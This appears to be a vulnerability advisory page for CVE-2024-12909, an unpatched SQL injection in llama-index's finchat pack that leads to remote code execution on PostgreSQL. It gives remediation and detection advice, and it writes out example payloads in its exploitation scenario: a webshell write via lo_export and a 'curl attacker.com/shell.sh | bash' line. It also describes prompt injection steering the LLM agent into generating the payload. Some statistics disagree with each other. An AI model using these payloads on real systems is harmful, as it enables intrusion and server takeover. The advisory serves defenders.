CVE-2024-12909: llama-index finchat: SQL injection enables RCE

GHSA-x48g-hm9c-ww42 CRITICAL PoC AVAILABLE CISA: ATTEND
Published March 20, 2025
CISO Take

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Sources: NVD EPSS GitHub Advisory CISA KEV ATLAS

What is the risk?

Severity is maximum (CVSS 10.0) with the most dangerous attack profile possible: network-accessible, low complexity, no privileges required, no user interaction, full CIA impact with scope change. The lack of any patch and the package's abandonment mean this vulnerability will never be remediated upstream. While EPSS (0.694%) reflects relatively low current active exploitation, the trivial exploitability of SQL injection combined with the PostgreSQL large object RCE path — a well-documented technique (e.g., CVE-2019-9193 precedent) — means exploitation requires minimal attacker sophistication. Organizations running AI financial analysis agents backed by PostgreSQL face the highest exposure.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
LlamaIndex pip <= 0.3.0 No patch
50.6K 241 dependents Pushed 4d ago 87% patched ~50d to patch Full package profile →

Do you use LlamaIndex? You're affected.

How severe is it?

CVSS 3.1
10.0 / 10
EPSS
1.3%
chance of exploitation in 30 days
Higher than 67% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Changed
C High
I High
A High

What should I do?

5 steps
  1. Remove immediately

    Uninstall llama-index-packs-finchat — no patch exists and none will be issued. Pin your llama-index packs to avoid automatic reinstallation.

  2. Audit dependent packages

    Run pip show llama-index-packs-finchat and audit requirements.txt/pyproject.toml across all AI services.

  3. PostgreSQL hardening

    Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no pg_execute_server_program privilege. Disable COPY TO PROGRAM for application roles.

  4. Detection

    Monitor PostgreSQL logs for lo_create, lo_import, lo_export, COPY TO PROGRAM, and pg_largeobject table access patterns from application service accounts.

  5. Replacement

    Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system security
NIST AI RMF
MS-2.5 - AI Risk Measurement and Monitoring
OWASP LLM Top 10
LLM07:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-12909?

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Is CVE-2024-12909 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-12909, increasing the risk of exploitation.

How to fix CVE-2024-12909?

1. **Remove immediately**: Uninstall `llama-index-packs-finchat` — no patch exists and none will be issued. Pin your `llama-index` packs to avoid automatic reinstallation. 2. **Audit dependent packages**: Run `pip show llama-index-packs-finchat` and audit `requirements.txt`/`pyproject.toml` across all AI services. 3. **PostgreSQL hardening**: Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no `pg_execute_server_program` privilege. Disable `COPY TO PROGRAM` for application roles. 4. **Detection**: Monitor PostgreSQL logs for `lo_create`, `lo_import`, `lo_export`, `COPY TO PROGRAM`, and `pg_largeobject` table access patterns from application service accounts. 5. **Replacement**: Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

What systems are affected by CVE-2024-12909?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM-integrated database tools, Financial analysis AI pipelines, RAG pipelines with SQL backends.

What is the CVSS score for CVE-2024-12909?

CVE-2024-12909 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 1.31%.

What is the AI security impact?

Affected AI Architectures

Agent frameworksLLM-integrated database toolsFinancial analysis AI pipelinesRAG pipelines with SQL backends

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.005 AI Agent Tool
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6
NIST AI RMF: MS-2.5
OWASP LLM Top 10: LLM07:2025

What are the technical details?

Original Advisory

A vulnerability in the FinanceChatLlamaPack of the llama-index-packs-finchat package, versions up to v0.3.0, allows for SQL injection in the `run_sql_query` function of the `database_agent`. This vulnerability can be exploited by an attacker to inject arbitrary SQL queries, leading to remote code execution (RCE) through the use of PostgreSQL's large object functionality. The issue is resolved by no longer officially supporting the package and moving it into the `stale_packages` branch on the repo, this removing it from documentation etc.

Exploitation Scenario

An attacker targeting an AI financial analysis application built on LlamaIndex sends a crafted natural-language query (or, in an agentic pipeline, injects a malicious instruction via prompt injection). The LLM generates and passes a SQL string containing a PostgreSQL large object payload to `run_sql_query`. Example payload: `'; SELECT lo_import('/etc/passwd'); SELECT lo_export(16384, '/var/www/html/shell.php'); --`. If the PostgreSQL user has sufficient privileges, this writes a webshell to the server filesystem. Alternatively, if the role has `SUPERUSER`, the attacker uses `COPY (SELECT 'payload') TO PROGRAM 'curl attacker.com/shell.sh | bash'` to achieve direct OS command execution. The entire attack chain is unauthenticated and requires no prior knowledge of the schema.

Weaknesses (CWE)

CWE-89 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
  • [Architecture and Design] If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
March 20, 2025
Last Modified
April 3, 2025
First Seen
March 24, 2026

Related Vulnerabilities